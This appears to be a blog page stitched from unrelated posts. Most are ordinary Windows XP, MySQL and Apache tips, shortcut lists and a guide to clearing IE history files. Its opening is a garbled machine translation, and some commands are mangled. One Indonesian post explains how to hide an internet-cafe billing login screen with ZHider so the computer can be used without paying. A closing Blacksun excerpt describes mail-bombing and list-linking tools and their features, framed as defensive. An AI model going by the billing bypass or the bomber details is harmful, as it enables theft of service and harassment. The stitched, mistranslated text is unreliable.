Save the file name OEMINFO.ini. After the search for *. bmp image and name OEMLOGO.bmp, if it is ... the second place in the file C: \ Windows \ system32 or system (the system's better, though I would replace the logo more easily find the file).

Source : http://www.yogyafree.net/magazine.htm, http://www.yogyafree.net/forum2
Friday, December 26, 2008

Xampp and MySQL Database Server

What is the database? xampp what? a brief description below hopefully can answer the questions above.

A system that does not collect data will be separated from the use of databases. According Bunafit Nugroho (2007) database is a form of media used to store data. Where the database can be illustrated as a warehouse used as a place meyimpan various items in a database, an item is data. In a database consists of two basic parts to build a database, the tables and columns.

Table

In a database table is also known that the term table is also often called the entity or entities, where the table is used to store a group of data. Table function is to store data that is special. So derived from the database is a table, where a table in the database can be more than one (Nugroho, 2005: 75). It is also important that a table can not be there before the database is created.

Installing Apache Web Server, PHP and Mysql

Before installing a web server, php and mysql of course we must have a file sourcenya first. These steps are the installation files from the source.
Source files can be downloaded from:
And of course to be able to download files in the computer must be connected to the Internet. After the source files of the installation is ready to be carried out.
Installation Steps

Installation Steps
1. Httpd extract the files, eg httpd version is httpd-2.0_0_NN.tar
tar xvf httpd-2_0_NN.tar
2. PHP file extracts, eg php version php-NN.tar
tar-xvf php-NN.tar
3. Into the directory httpd
cd httpd-2_0_NN
4. Httpd configuration
. / configure-enable-so
make
make install

Installation Webserver (Apache, MySQL, PHP) on FreeBSD

Webserver is quite important in the computer network, especially in the Internet world. Why important? This is important because the webserver will be the delivery of information from a server, be it email, information through the web, through a network of monitoring information can also be done via the web at work in the webserver. A webserver is a standard that has webserver:

* Webserver (Apache)
* Database (MySQL)
* Penterjemah script (PHP)

I use the free and opensource. Here I will give a tutorial on how installasinya and only a few initial configuration. And I use the port - the port because we will get a more precise source is installed properly and if the configuration, please set your own. The installation should start the installation of MySQL, Apache PHP ago. Next step is

MySQL installation
# Cd / usr/ports/database/mysql50-server /
# Make install clean
# Rehash
# / Usr / local / bin / mysql_install_db
# Cp / usr / local / share / mysql / my-medium.cnf / var / db / mysql / my.cnf
# Chown-R mysql / var / db / mysql /
# Chgrp-R mysql / var / db / mysql /
# / Usr / local / bin / mysqld_safe-user = mysql &
# / Usr / local / bin / mysqladmin-u root password Newpassword

information:
Step 4 is the grand-installation database,
Step-7 is to run the MySQL
Step-8 to the command is to change the MySQL root password

Tuesday, December 16, 2008

How to create a bootable Windows XP SP1 CD (Nero)

How to create a bootable Windows XP SP1 CD (Nero):

Step 1

Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT

Step 2

Copy the entire Windows XP CD into folder C:\WINXPSP1

Step 3

You will have to download the SP1 Update, which is 133MB.
Rename the Service Pack file to XP-SP1.EXE
Extract the Service Pack from the Run Dialog using the command:
C:\XP-SP1.EXE -U -X:C:\SP1106

Step 4

Open Start/Run... and type the command:
C:\SP1106\update\update.exe -s:C:\WINXPSP1

Click OK

Folder C:\WINXPSP1 contains: Windows XP SP1


Windows Xp Tweaks, A work in Progress

OK, every time I have to install, reinstall, or optimize someone elses XP setup I forget what I need to do, so I have to go throught dozens of magizines and find all the good useful tweaks that will speed up the computer and Windows.
So I made this tutoral and text file so I and everyone else can see and use on a floppy or thumb drive or something and carry it around, so you don't have to forget and can tweak the computer without downloading anything.

And if you have something to add, just post it and I'll add it to the text file and this post.

Services to turn off:
Alerter
Application Management
Automatic Updates
ClipBook
Distributed Link Tracking Client
Error Reporting Service
Fast User Switching Compatibility
Messenger
Portable Media Serial Number Service
Remote Registry
Routing and Remote Access
Task Scheduler
Telnet
TPC/IP NetBIOS Helper
Uninterruptible Power Supply


Windows XP Startup and Performance Tweaks

Windows XP is now the predominant consumer OS of both gamers and power users. Sure, many of us still dual-boot with Win9x, because it is faster for many games, but the joy of a true 32-bit operating system with full consumer support is too much for many of us to remain loyal to NT 4.0 or Windows 2000. Now that Windows XP has matured past its infancy and many (but by far not all) of the bugs have been shaken out of it, Ars Technica brings you the first in a series of tweak guides for this illustrious and yet somewhat finicky OS.

This first guide aims to cover two main areas of contention: the boot process (sans the system services, which are an entire guide of their own) and a mishmash of general computing tweaks. The boot tweaks will be comprised of not only system settings, but also several under-utilized applications that can dramatically reduce load time. The general performance tweaks are simply various tweaks that do not quite fit in with the theme of this article, but still have a significant effect on system startup performance (because most any tweaks that one performs should have some kind of effect on the startup time of the system).

Mencurangi (hampir) Semua Jenis Billing Warnet

Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu. Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu.
Yap.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Memberi Logo Pada Properties My Computer

Hai Frend’s… AQ cuma coba-coba aja nulis artikel ini. Sebenarnya trik ini sudah banyak yang tahu…ya…bagi yang dah tau nggak usah baca artikel ini, buang-buang waktu aja.
Bagi yang belum tau, sekarang coba klik kanan pada MyComputer di desktop Anda dan klik properties. Sewaktu kita baru menginstall OS akan terlihat logo windows pada bagian atas dan bagian bawah kosong (kalo diinstall toko biasanya dah dikasih logo ttt). Kita akan memberikan logo disitu.

Buka notepad dan tuliskan script berikut:

===== sof =====
[General]
Manufacturer= Yogyafree OK {bebas}
Model=rossee.100webspace.net {bebas}
[Support Information]
Line1= Kunjungi kami di http://www.yogyafree.com/ {bebas}
Line2= dan seterusnya… {bebas}
Line3= … {bebas}
===== eof =====

Simpan dengan nama file OEMINFO.ini. Setelah itu cari gambar *.bmp dan beri nama OEMLOGO.bmp, jika sudah… letakkan kedua file tersebut di C:\WINDOWS\system atau system32 (lebih baik system aja, biar kalo mo ganti logo lagi mudah cari filenya).

Windows Xp: Speed Up Your, Speed Up Your Network and Internet Access

I have a dial up connection and it improve my speeds about 25% in surfing the internet. give it a try. Im IT , only do it if you feel comfortable with changing registry.

Increasing network browsing speed

Does your computer slow down when you browse your local area network and connect to other computers that are sharing data? One of the most common causes of this slowdown is a feature of Windows Explorer that looks for scheduled tasks on remote computers. This effort can take some time on some computers and can really slow down your browsing. The window with which you are browsing the network may appear to freeze momentarily, as the system is waiting for a response from the remote computer.

Windows XP: Speeding Disk Access

Although this problem is a complex one, the solution is very simple. Instead of having to wait for the remote scheduled tasks, which is useless information to anyone who is not a system administrator remotely configuring scheduled tasks, you can disable this feature.

Window's Tweak: Hack Your Start Button

I've gotten so many requests on how to change the Windows XP Start button, I'm going to teach you how to hack it to pieces manually.
Before you get started, you might want to print out this page for easy reference.

Change the Start text

1. First of all, make sure you download Resource Hacker. You'll need this puppy to edit resources inside your Windows shell.

2. Locate explorer.exe in your c:\Windows directory. Make a copy of the file in the same directory and rename it explorer.bak.

3. Now launch Resource Hacker. In the File menu, open explorer.exe. You'll now see a bunch of collapsed folders.

4. Expand the String Table folder and then find folder No. 37 (folder No. 38 if you're in Windows Classic mode).

5. Click on resource 1033 and locate the text that says "Start." This is your Start button, and now you've got control over what it says! Change the "Start" text to your text of choice. You don't have a character limit, but the text takes up valuable taskbar space, so don't make it too long.

6. Click on the button labeled Compile Script. This updates the settings for your Start button. But nothing will happen until you complete through step #20, so keep going!

Change your hover text

7. While you're here, why not also change the text that pops up when your mouse hovers over your Start button?

8. Right now it says "Click here to begin." Well, duh! We already know that's where to begin!

9. Open folder No. 34 and click on resource 1033.

10. Find the text that says "Click here to begin" and change it to something cooler. Might I suggest "Click here for a good time, baby."

11. Click on the Compile Script button to update this resource.

Customize your Start icon

12. For an added bonus, you can also change the Windows icon to the left of the text, too.

13. Collapse the String Table folder and expand the Bitmap folder at the top of your folder list.

14. Click on folder No. 143 and click on resource 1033. You should see that familiar Windows icon.

15. Go to the Action Menu and select "Replace bitmap." Select "Open file with new bitmap", and locate the replacement image on your machine. Note: The image must have a .bmp extension and a size of 25 pixels by 20 pixels. Then click the Replace button.

Here's the image I've been using instead of the Windows icon, in case you want to use it.



16. Now that you've made your changes, save the file in your Windows folder with another name, such as newstartbutton.exe. Don't name it Explorer.exe, because that file is already being used by your system. Close all open programs and restart your system.

17. Boot into Safe Mode With Command Prompt by pressing F8 on startup. Then choose Safe Mode in the command prompt.

18. Log on as administrator and enter your password.

19. When the command prompt comes up, make sure you're in the right directory by typing "cd c:\windows" (without the quotes).

20. Now type "copy c:\windows\newstartbutton.exe c:\windows\explorer.exe" (no quotes). Type "yes" (no quotes) to overwrite the existing file, then restart your system by typing "shutdown -r" (no quotes).

When Windows relaunches, you'll see your new Start button in all its glory!
written by Sarah Lane on Wednesday, July 21, 2004

WindowsTrue Hidden Files

--ACRONYMS--
DOS = Disk Operating System, or MS-DOS
MSIE = Microsoft Internet Explorer
TIF = Temporary Internet Files (folder)
HD = Hard Drive
OS = Operating System
FYI = For Your Information

1)SEEING IS BELIEVING
No. Enabling Windows Explorer to "show all files" does not show the files in mention. No. DOS does not list the files after receiving a proper directory listing from root. And yes. Microsoft intentionally disabled the "Find" utility from searching through one of the folders.

Oh, but that's not all.

To see for yourself simply do as you would normally do to clear your browsing history. Go to Internet Options under your Control Panel. Click on the [Clear History] and [Delete Files] buttons. (Make sure to include all offline content.)

So, has your browsing history been cleared? One would think so.

These are the names and locations of the "really hidden files":

c:\windows\history\history.ie5\index.dat
c:\windows\tempor~1\content.ie5\index.dat
If you have upgraded MSIE several times, they might have alternative names of mm256.dat and mm2048.dat, and may also be located here:

c:\windows\tempor~1\
c:\windows\history\

Not to mention the other alternative locations under:

c:\windows\profiles\%user%\...
c:\windows\application data\...
c:\windows\local settings\...
c:\windows\temp\...
c:\temp\...
(or as defined in your autoexec.bat.)

FYI, there are a couple other index.dat files that get hidden as well, but they are seemingly not very important. See if you can find them.

2)IF YOU HAVE EVER USED MICROSOFT INTERNET EXPLORER
1) Shut your computer down, and turn it back on.
2) While your computer is booting keep pressing the [F8] key until you are given an option screen.
3) Choose "Command Prompt Only" (This will take you to true DOS mode.) Windows ME users must use a boot disk to get into real DOS mode.
4) When your computer is done booting, you will have a C:\> followed by a blinking cursor.
Type this in, hitting enter after each line. (Obviously, don't type the comments in parentheses.)

C:\WINDOWS\SMARTDRV (Loads smartdrive to speed things up.)
CD\
DELTREE/Y TEMP (This line removes temporary files.)
CD WINDOWS
DELTREE/Y COOKIES (This line removes cookies.)
DELTREE/Y TEMP (This removes temporary files.)
DELTREE/Y HISTORY (This line removes your browsing history.)
DELTREE/Y TEMPOR~1 (This line removes your internet cache.)

(If that last line doesn't work, then type this

CD\WINDOWS\APPLIC~1
DELTREE/Y TEMPOR~1

(If that didn't work, then type this

CD\WINDOWS\LOCALS~1
DELTREE/Y TEMPOR~1
If you have profiles turned on, then it is likely located under \windows\profiles\%user%\, while older versions of MSIE keep them under \windows\content\.)

FYI, Windows re-creates the index.dat files automatically when you reboot your machine, so don't be surprised when you see them again. They should at least be cleared of your browsing history.

3)CLEARING YOUR REGISTRY
It was once believed that the registry is the central database of Windows that stores and maintains the OS configuration information. Well, this is wrong. Apparently, it also maintains a bunch of other information that has absolutely nothing to do with the configuration. I won't get into the other stuff, but for one, your typed URLs are stored in the registry.

HKEY_USERS/Default/Software/Microsoft/Internet Explorer/TypedURLs/
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs/
These "Typed URLs" come from MSIE's autocomplete feature. It records all URLs that you've typed in manually in order to save you some time filling out the address field.

4)SLACK FILES
As you may already know, deleting files only deletes the references to them. They are in fact still sitting there on your HD and can still be recovered by a very motivated person.
Use window washer to delete slack files. /http://www.webroot.com/download/0506/reg3ww.exe

5)STEP-BY-STEP GUIDE THROUGH YOUR HIDDEN FILES
The most important files to be paying attention to are your "index.dat" files. These are database files that reference your history, cache and cookies. The first thing you should know is that the index.dat files is that they don't exist in less you know they do. They second thing you should know about them is that some will *not* get cleared after deleting your history and cache.

To view these files, follow these steps:

In MSIE 5.x, you can skip this first step by opening MSIE and going to Tools > Internet Options > [Settings] > [View Files].
Now write down the names of your alphanumeric folders on a piece of paper. If you can't see any alphanumeric folders then start with step 1 here:

1) First, drop to a DOS box and type this at prompt (in all lower-case). It will bring up Windows Explorer under the correct directory.

c:\windows\explorer /e,c:\windows\tempor~1\content.ie5\
You see all those alphanumeric names listed under "content.ie5?" (left-hand side.) That's Microsoft's idea of making this project as hard as possible. Actually, these are your alphanumeric folders that was created to keep your cache. Write these names down on a piece of paper. (They should look something like this: 6YQ2GSWF, QRM7KL3F, U7YHQKI4, 7YMZ516U, etc.) If you click on any of the alphanumeric folders then nothing will be displayed. Not because there aren't any files here, but because Windows Explorer has lied to you. If you want to view the contents of these alphanumeric folders you will have to do so in DOS.

2) Then you must restart in MS-DOS mode. (Start > Shutdown > Restart in MS-DOS mode. ME users use a bootdisk.)

Note that you must restart to DOS because windows has locked down some of the files and they can only be accessed in real DOS mode.

3) Type this in at prompt:

CD\WINDOWS\TEMPOR~1\CONTENT.IE5
CD %alphanumeric%
(replace the "%alphanumeric%" with the first name that you just wrote down.)

DIR/P
The cache files you are now looking at are directly responsible for the mysterious erosion of HD space you may have been noticing.

5) Type this in:

CD\WINDOWS\TEMPOR~1\CONTENT.IE5
EDIT /75 INDEX.DAT
You will be brought to a blue screen with a bunch of binary.

6) Press and hold the [Page Down] button until you start seeing lists of URLs. These are all the sites that you've ever visited as well as a brief description of each. You'll notice it records everything ou've searched for in a search engine in plain text, in addition to the URL.

7) When you get done searching around you can go to File > Exit. If you don't have mouse support in DOS then use the [ALT] and arrow keys.

Next you'll probably want to erase these files by typing this:

C:\WINDOWS\SMARTDRV
CD\WINDOWS
DELTREE/Y TEMPOR~1
(replace "cd\windows" with the location of your TIF folder if different.)

9) Then check out the contents of your History folder by typing this:

CD\WINDOWS\HISTORY\HISTORY.IE5
EDIT /75 INDEX.DAT
You will be brought to a blue screen with more binary.

10) Press and hold the [Page Down] button until you start seeing lists of URLS again.

This is another database of the sites you've visited.

11) And if you're still with me, type this:

CD\WINDOWS\HISTORY
12) If you see any mmXXXX.dat files here then check them out (and delete them.) Then:

CD\WINDOWS\HISTORY\HISTORY.IE5
CD MSHIST~1
EDIT /75 INDEX.DAT
More URLs from your internet history. Note, there are probably other mshist~x folders here so you can repeat these steps for every occurence if you please.

13) By now, you'll probably want to type in this:

CD\WINDOWS
DELTREE/Y HISTORY

6)HOW MICROSOFT DOES IT
How does Microsoft make these folders/files invisible to DOS?

The only thing Microsoft had to do to make the folders/files invisible to a directory listing is to
set them +s[ystem]. That's it.

So how does Microsoft make these folders/files invisible to Windows Explorer?

The "desktop.ini" is a standard text file that can be added to any folder to customize certain aspects of the folder's behavior. In these cases, Microsoft utilized the desktop.ini file to make these files invisible. Invisible to Windows Explorer and even to the "Find: Files or Folders" utility. All that Microsoft had to do was create a desktop.ini file with certain CLSID tags and the folders would disappear like magic.

To show you exactly what's going on:

Found in the c:\windows\temporary internet files\desktop.ini and
the c:\windows\temporary internet files\content.ie5\desktop.ini is this text:

[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
Found in the c:\windows\history\desktop.ini and the c:\windows\history\history.ie5\desktop.ini is this text:

[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
CLSID={FF393560-C2A7-11CF-BFF4-444553540000}
The UICLSID line cloaks the folder in Windows Explorer. The CLSID line disables the "Find" utility
from searching through the folder.

To see for yourself, you can simply erase the desktop.ini files. You'll see that it will instantly give
Windows Explorer proper viewing functionality again, and the "Find" utility proper searching capabilities again. Problem solved right? Actually, no. As it turns out, the desktop.ini files get reconstructed every single time you restart your computer. Nice one, Slick.

Luckily there is a loophole which will keep Windows from hiding these folders. You can manually edit the desktop.ini's and remove everything except for the "[.ShellClassInfo]" line. This will trick windows into thinking they have still covered their tracks, and wininet won't think to reconstruct them.

How to use the Google calculator

Google’s calculator tries to understand the problem you are attempting to solve without requiring you to use special syntax. However, it may be helpful to know the most direct way to pose a question to get the best results. Listed below are a few suggestions for the most common type of expressions (and a few more esoteric ones).

Most operators come between the two numbers they combine, such as the plus sign in the expression 1+1.

Operator Function Example
+ addition 3+44
- subtraction 13-5
* multiplication 7*8
/ division 12/3
^ exponentiation (raise to a power of) 8^2
% modulo (finds the remainder after division) 8%7
choose X choose Y determines the number of ways of choosing a set of Y elements from a set of X elements 18 choose 4
th root of calculates the nth root of a number 5th root of 32
% of X % of Y computes X percent of Y 20% of 150

Using Google for searching ebooks

Google has some fantastic potential for you to find whatever you are after on the internet.

To search for a book / program / file perhaps try the following.

Go to Google's search page and use the following criteria in the search dialog

intitle:index.of? file extension Name of item

e.g. intitle:index.of? chm syngress

Windows Shortcuts

Run Commands:

Quote:
compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt


Run Commands to access the control panel:

Quote:
Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts
Internet Properties control inetcpl.cpl
Keyboard Properties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl
Printers Folder control printers
Sound Properties control mmsys.cpl sounds
System Properties control sysdm.cpl



Command Prompt:

Quote:
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a M*cros*ft Windows file back to it's original format.
EXTRACT Extract files from the M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications




Windows XP Shortcuts:

Quote:
ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items




Windows Explorer Shortcuts:

Quote:
ALT+SPACEBAR - Display the current window’s system menu
SHIFT+F10 - Display the item's context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item’s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item




Internet Explorer Shortcuts:

Quote:
CTRL+A - Select all items on the current page
CTRL+D - Add the current page to your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or active frame
CTRL+S - Save the current page
CTRL+W - Close current browser window
CTRL+ENTER - Adds the http://www. (url) .com
SHIFT+CLICK - Open link in new window
BACKSPACE - Go to the previous page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a document
TAB - Move forward through items on a page
END - Move to the end of a document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page focus
ALT+RIGHT ARROW - Go to the next page
SHIFT+CTRL+TAB - Move back between frames
SHIFT+F10 - Display a shortcut menu for a link
SHIFT+TAB - Move back through the items on a page
CTRL+TAB - Move forward between frames
CTRL+C - Copy selected items to the clipboard
CTRL+V - Insert contents of the clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a document
END - Move to the end of a document
F1 - Display Internet Explorer Help


Source :

http://www.microsoft.com

The Mailing List Security Mini

WAuthor's notes: I'm getting tired of repeating myself*, so please read my previous tutorials (located at http://blacksun.box.sk).

Otherwise, you might not understand some of the terminology.

* Until recently, I had to repeat concepts and terminology that I already explained about in previous tutorials so people who are just reading my first tutorial won't have any difficulties understanding it. Well, I'm kinda tired of doing so, and I'd rather spend my precious time on writing the actual content, so please read my previous tutorials first. Oh, by the way, I just want you to understand that I am writing this tutorial in order to teach people how to protect themselves, not to teach them how to attack others. Also, I am not responsible for anything you do, and I don't recommend you to start hacking every mailing list in sight. Use this information in order to protect yourself and your mailing list only (and maybe a friend's mailing list, if he needs help). If you want to impress someone, the best way is to protect him, not to attack him. This will show your true power. ;-) Anyway, have fun!

Send comments or questions to barakirs@netvision.net.il, or post them on our message board at blacksun.box.sk.

Mail Bombing and List Linking

Important Note
 ==============
The writers of this article nor BSRF believe that mail bombing and list linking are against the law, and should not be carried out nor tolerated by anyone. In fact, these are two of the dumbest things you could do on the net, and will only get you mocked. Such attacks are only carried out by kids with too much time in their hands, who are not smart enough to carry out more sophisticated attacks.

 Know Your Enemy
 ===============

 Up Yours:

The Up Yours mail-bombing program is probably the most popular bomber  out there. It uses minimal resources, does a superb job, has a simple  user interface, and attempts to obscure the attacker's source  address. Features of the program include being able to specify times  of day to start and stop as well as the number of messages with which  it will hammer the target.

This bomber runs only on the Microsoft Windows platform. If you are a  system administrator, you will want to scan your local drives for the  following files:

 upyours.exe
 upyours2.zip
 upyours3.zip

If these files appear in a user's directory, there is a strong  likelihood that he is about to e-mail bomb someone (of course,  perhaps he simply spends his time collecting hacking and cracking  programs). In any event, the utility is hard to find. If one of your  users has acquired this program, he clearly has an interest in  hacking or cracking :o)

 KaBoom:

KaBoom differs significantly from Up Yours. In the main program, you  find a utility to list link. Using this function, you can subscribe  your target to hundreds of e-mail lists. When I say that a target has  been list-linked, I mean the target has been subscribed (without his  consent) to one or more mailing lists. Such tools submit registration  requests on behalf of the victim, forging his e-mail address. In any  event, this utility's signature files are these:

 kaboom!3.zip
 kaboom3.exe

 Avalanche:

The Avalanche e-mail bombing utility works smoothly and is well  designed. The list groups are displayed in a drop-down combo box, and  their individual lists are displayed in a list box. Three clicks of a  mouse and your target is in hot water.

TIP: The programmer here was a bit absentminded. The program was  written at least in part in Microsoft Visual Basic 4.0. As such,  there are a series of DLL files that are required to run the application. These are missing from the general distribution of this  utility; therefore, serious bombers must go out onto the Internet to  retrieve those files (one is OC2.DLL). Because of this, I would estimate that Avalanche is probably used less than its counterparts,  even though its overall design is superior. Inconvenience discourages  most users of this particular ilk. The signature files for this product are:

 alanch10.zip
 avalanche20.zip
 avalanche.exe

 Unabomber:

